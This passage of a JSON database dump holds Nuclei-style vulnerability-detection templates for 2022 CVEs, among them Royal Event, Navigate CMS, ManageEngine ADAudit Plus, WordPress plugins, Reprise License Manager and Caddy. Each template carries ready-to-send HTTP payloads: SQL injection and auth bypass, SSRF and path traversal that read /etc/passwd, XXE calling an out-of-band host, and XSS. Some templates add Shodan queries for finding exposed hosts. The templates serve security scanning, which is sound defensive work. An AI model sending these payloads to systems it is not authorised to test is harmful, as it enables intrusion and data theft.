of the entire database.\n remediation: |\n To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.\n reference:\n - https://www.exploit-db.com/exploits/50934\n - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip\n - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28080\n - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-28080\n cwe-id: CWE-89\n epss-score: 0.01461\n epss-percentile: 0.86424\n cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: event_management_system_project\n product: event_management_system\n tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project\n\nhttp:\n - raw:\n - |\n POST /royal_event/ HTTP/1.1\n Host: {{Hostname}}\n Content-Length: 353\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n ------WebKitFormBoundaryCSxQll1eihcqgIgD\n Content-Disposition: form-data; name=\"username\"\n\n {{username}}\n ------WebKitFormBoundaryCSxQll1eihcqgIgD\n Content-Disposition: form-data; name=\"password\"\n\n {{password}}\n ------WebKitFormBoundaryCSxQll1eihcqgIgD\n Content-Disposition: form-data; name=\"login\"\n\n\n ------WebKitFormBoundaryCSxQll1eihcqgIgD--\n - |\n POST /royal_event/btndates_report.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD\n Content-Disposition: form-data; name=\"todate\"\n\n 1' UNION ALL SELECT 
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD\n Content-Disposition: form-data; name=\"search\"\n\n 3\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD\n Content-Disposition: form-data; name=\"fromdate\"\n\n 01/01/2011\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{md5(\"{{randstr}}\")}}'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950", "hash": "444e9305c08679ec45a6d9aac7ee5de8", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fa" }, "name": "CVE-2022-28117.yaml", "content": "id: CVE-2022-28117\n\ninfo:\n name: Navigate CMS 2.9.4 - Server-Side Request Forgery\n author: theabhinavgaur\n severity: medium\n description: |\n Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. 
This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html\n - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5\n - https://www.youtube.com/watch?v=4kHW95CMfD0\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28117\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 4.9\n cve-id: CVE-2022-28117\n cwe-id: CWE-918\n epss-score: 0.03193\n epss-percentile: 0.9018\n cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: naviwebs\n product: navigate_cms\n tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs\n\nhttp:\n - raw:\n - |\n GET /navigate/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /navigate/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n -----------------------------123456789012345678901234567890\n Content-Disposition: form-data; name=\"login-username\"\n\n {{username}}\n -----------------------------123456789012345678901234567890\n Content-Disposition: form-data; name=\"csrf_token\"\n\n {{csrf_token}}\n -----------------------------123456789012345678901234567890\n Content-Disposition: form-data; name=\"login-password\"\n\n {{password}}\n -----------------------------123456789012345678901234567890\n - |\n POST 
/navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n limit=5&language=en&url=file:///etc/passwd\n - |\n GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf_token\n group: 1\n regex:\n - csrf_token\" value=\"([a-f0-9]{64})\n internal: true\n part: body\n# digest: 4b0a00483046022100b936ab16d4511ae94e20920ea423189e833767cd09607b9fd39ae31767758827022100e19df53050f82f76d6172e2c94eb2f93c01f249e4ce37a65a2e05d4c7624ba12:922c64590222798bb761d5b6d8e72950", "hash": "8fd1db4ed0dbecb9ff307f0aed34fa33", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fb" }, "name": "CVE-2022-28219.yaml", "content": "id: CVE-2022-28219\n\ninfo:\n name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an\n unauthenticated XML entity injection attack that can lead to remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system.\n remediation: |\n Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus\n is configured with a dedicated service account with restricted privileges.\n reference:\n - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html\n - https://www.horizon3.ai/red-team-blog-cve-2022-28219/\n - https://manageengine.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28219\n - http://cewolf.sourceforge.net/new/index.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 
cvss-score: 9.8\n cve-id: CVE-2022-28219\n cwe-id: CWE-611\n epss-score: 0.97392\n epss-percentile: 0.99909\n cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zohocorp\n product: manageengine_adaudit_plus\n shodan-query: http.title:\"ADAudit Plus\" || http.title:\"ManageEngine - ADManager Plus\"\n tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/api/agent/tabs/agentData\"\n\n body: |\n [\n {\n \"DomainName\": \"{{Host}}\",\n \"EventCode\": 4688,\n \"EventType\": 0,\n \"TimeGenerated\": 0,\n \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n }\n ]\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"ManageEngine\"\n# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950", "hash": "490561578a7d4269ba401d164b1b92fe", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fc" }, "name": "CVE-2022-28290.yaml", "content": "id: CVE-2022-28290\n\ninfo:\n name: WordPress Country Selector <1.6.6 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: |\n WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479\n - https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28290\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-28290\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36353\n cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: welaunch\n product: wordpress_country_selector\n framework: wordpress\n tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src=x onerror=alert(document.domain)>'\n - 'country_selector_'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 
200\n# digest: 4a0a00473045022100ebe533ef2ec09740f696d061f09daee596b1bfa0a1a88c9b3fe5abd00eeddd9e02205eca23209af224a5ef2c7ab7d53b737c3db0bb4012a36bf2b6c193725f4d3ae6:922c64590222798bb761d5b6d8e72950", "hash": "60b0b83a562c94134601950bd1cdcc16", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fd" }, "name": "CVE-2022-28363.yaml", "content": "id: CVE-2022-28363\n\ninfo:\n name: Reprise License Manager 14.2 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: |\n Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://www.reprisesoftware.com/products/software-license-management.php\n - https://github.com/advisories/GHSA-rpvc-qgrm-r54f\n - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28363\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-28363\n cwe-id: CWE-79\n epss-score: 0.00237\n epss-percentile: 0.61062\n cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: reprisesoftware\n product: reprise_license_manager\n tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<svg/onload=alert(document.domain)>'\n - 'Login Failed'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950", "hash": "f60f1d1d22e61759216a699cfbcf8953", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fe" }, "name": "CVE-2022-28365.yaml", "content": "id: CVE-2022-28365\n\ninfo:\n name: Reprise License Manager 14.2 - Information Disclosure\n author: Akincibor\n severity: medium\n description: |\n Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. 
An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager.\n reference:\n - https://www.reprisesoftware.com/products/software-license-management.php\n - https://github.com/advisories/GHSA-4g2v-6x25-vr7p\n - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28365\n - https://www.reprisesoftware.com/RELEASE_NOTES\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-28365\n cwe-id: CWE-425\n epss-score: 0.00689\n epss-percentile: 0.77964\n cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: reprisesoftware\n product: reprise_license_manager\n tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/goforms/rlminfo\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"RLM Version\"\n - \"Platform type\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950", "hash": "90d140be6882fd6fab3a0cfaaec1df8a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ff" }, "name": "CVE-2022-2863.yaml", "content": "id: CVE-2022-2863\n\ninfo:\n name: WordPress WPvivid Backup <0.9.76 - Local File Inclusion\n author: tehtbl\n severity: medium\n description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate 
a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.\n remediation: Upgrade to version 0.9.76 or later.\n reference:\n - https://seclists.org/fulldisclosure/2022/Oct/0\n - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5\n - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2863\n - https://github.com/rodnt/rodnt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 4.9\n cve-id: CVE-2022-2863\n cwe-id: CWE-22\n epss-score: 0.43289\n epss-percentile: 0.97257\n cpe: cpe:2.3:a:wpvivid:migration\\,_backup\\,_staging:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: wpvivid\n product: migration\\,_backup\\,_staging\n framework: wordpress\n tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '\"_ajax_nonce\":\"([0-9a-z]+)\"'\n internal: true\n part: body\n# digest: 
4a0a00473045022100fbf116fc126c32cb636b41b96e4869401ddff061cb73fbccdef08cfaab0c1e8202205d457dcc5c48196ab73bbbe156a7df100c74e1dc1279c0467df579ebe105a8f1:922c64590222798bb761d5b6d8e72950", "hash": "17d9c6609e4c203523ab8bb418746344", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308500" }, "name": "CVE-2022-28923.yaml", "content": "id: CVE-2022-28923\n\ninfo:\n name: Caddy 2.4.6 - Open Redirect\n author: Sascha Brendel,DhiyaneshDk\n severity: medium\n description: |\n Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks and credential theft.\n remediation: |\n Upgrade Caddy to version 2.4.7 or later to mitigate the vulnerability.\n reference:\n - https://lednerb.de/en/publications/responsible-disclosure/caddy-open-redirect-vulnerability/\n - https://www.cve.org/CVERecord?id=CVE-2022-28923\n - https://github.com/caddyserver/caddy/issues/4502\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28923\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-28923\n cwe-id: CWE-601\n epss-score: 0.00772\n epss-percentile: 0.79353\n cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: caddyserver\n product: caddy\n shodan-query: 'Server: caddy'\n tags: cve,cve2022,redirect,caddy,webserver,caddyserver\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 
4a0a00473045022100cbebfeb89bd39b904defdde1f57d31bff6dc62ce5057431d24fc8b77bc0d112c0220191dac951237739b839a09a20d0824c2519de476ec4ce4f10ce40b121448cb63:922c64590222798bb761d5b6d8e72950", "hash": "f771641d79196e4d19179e587ffba68e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308501" }, "name": "CVE-2022-28955.yaml", "content": "id: CVE-2022-28955\n\ninfo:\n name: D-Link DIR-816L - Improper Access Control\n author: arafatansari\n severity: high\n description: |\n D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router.\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the access control issue.\n reference:\n - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md\n - https://www.dlink.com/en/security-bulletin/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28955\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-28955\n cwe-id: CWE-287\n epss-score: 0.02487\n epss-percentile: 0.89836\n cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: dlink\n product: dir-816l_firmware\n shodan-query: http.html:\"DIR-816L\"\n tags: cve2022,cve,dlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/category_view.php\"\n - \"{{BaseURL}}/folder_view.php\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '<title>SharePort Web Access'\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022009d76438f14aca1cbc33ea695332b672ebdff31d2dba9171ba069cdf40c9b226022014e620a8fe211c0a70a706c03df6e4bd5961dff7ba59ca7bcb8c2c869e063a28:922c64590222798bb761d5b6d8e72950", "hash": "1508165ba70218c5770a72063e589dad", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308502" }, "name": "CVE-2022-29004.yaml", "content": "id: CVE-2022-29004\n\ninfo:\n name: Diary Management System 1.0 - Cross-Site Scripting\n author: TenBird\n severity: medium\n description: |\n Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt\n - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/\n - http://phpgurukul.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29004\n - https://github.com/manas3c/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29004\n cwe-id: CWE-79\n epss-score: 0.00218\n epss-percentile: 0.59134\n cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: e-diary_management_system\n tags: cve2022,cve,xss,authenticated,edms,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /edms/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n logindetail={{username}}&userpassword={{password}}&login=\n - |\n POST /edms/search-result.php HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n searchdata=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Serach Result Against \"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d9e1bedfff4118b3279485a5986c26b55fb4f70309678e686a3a2f739891d72402210097dbc2e593923e391651673ae5b43eb1eb8fca5089adec8517b32b625de2b72e:922c64590222798bb761d5b6d8e72950", "hash": "c2f2355d54949b8630d5e34177fa86ce", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308503" }, "name": "CVE-2022-29005.yaml", "content": "id: CVE-2022-29005\n\ninfo:\n name: Online Birth Certificate System 1.2 - Stored Cross-Site Scripting\n author: TenBird\n severity: medium\n description: |\n Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt\n - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29005\n - http://online.com\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29005\n cwe-id: CWE-79\n epss-score: 0.0015\n epss-percentile: 0.51178\n cpe: 
cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: phpgurukul\n product: online_birth_certificate_system\n tags: cve,cve2022,xss,obcs,authenticated,phpgurukul\nvariables:\n str: \"{{rand_base(6)}}\"\n\nhttp:\n - raw:\n - |\n POST /obcs/user/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n mobno={{username}}&password={{password}}&login=\n - |\n POST /obcs/user/profile.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n fname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n - |\n GET /obcs/user/dashboard.php HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'contains(header_3, \"text/html\")'\n - 'status_code_3 == 200'\n - contains(body_3, 'admin-name\\\">{{str}}')\n condition: and\n# digest: 4a0a0047304502200260f1d81ea298c0298f44f3ef3ee75de3c2779b7870077c7a54c55526f150e6022100b1cfcd5b8d8da68b83cab3ce4e5bbf99f031a927741f508f1c641d219ffe5719:922c64590222798bb761d5b6d8e72950", "hash": "c4d7dfcf4d9916bf8234bb15ecdbe370", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308504" }, "name": "CVE-2022-29006.yaml", "content": "id: CVE-2022-29006\n\ninfo:\n name: Directory Management System 1.0 - SQL Injection\n author: TenBird\n severity: critical\n description: |\n Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0.\n reference:\n - https://www.exploit-db.com/exploits/50370\n - https://phpgurukul.com/directory-management-system-using-php-and-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29006\n - https://github.com/sudoninja-noob/CVE-2022-29006/blob/main/CVE-2022-29006.txt\n - https://github.com/sudoninja-noob/CVE-2022-29006\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29006\n cwe-id: CWE-89\n epss-score: 0.21257\n epss-percentile: 0.96305\n cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: directory_management_system\n tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /admin/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username=admin' or '1'='1&password=1&login=login\n - |\n GET /admin/dashboard.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'DMS || Dashboard'\n - 'DMS Admin'\n - 'Admin Profile'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b032a0928542b07c129e656f021862237782c6d5334e70b894ab4ebcca9585c4022100f96c4c46eee96e11abe556a475886c305dbe89a53f3ba87b4a652358759cead5:922c64590222798bb761d5b6d8e72950", "hash": "62717bab1f261fb505b96a5a60aa14bd", "level": 6, "time": "2024-05-17 23:39:45" 
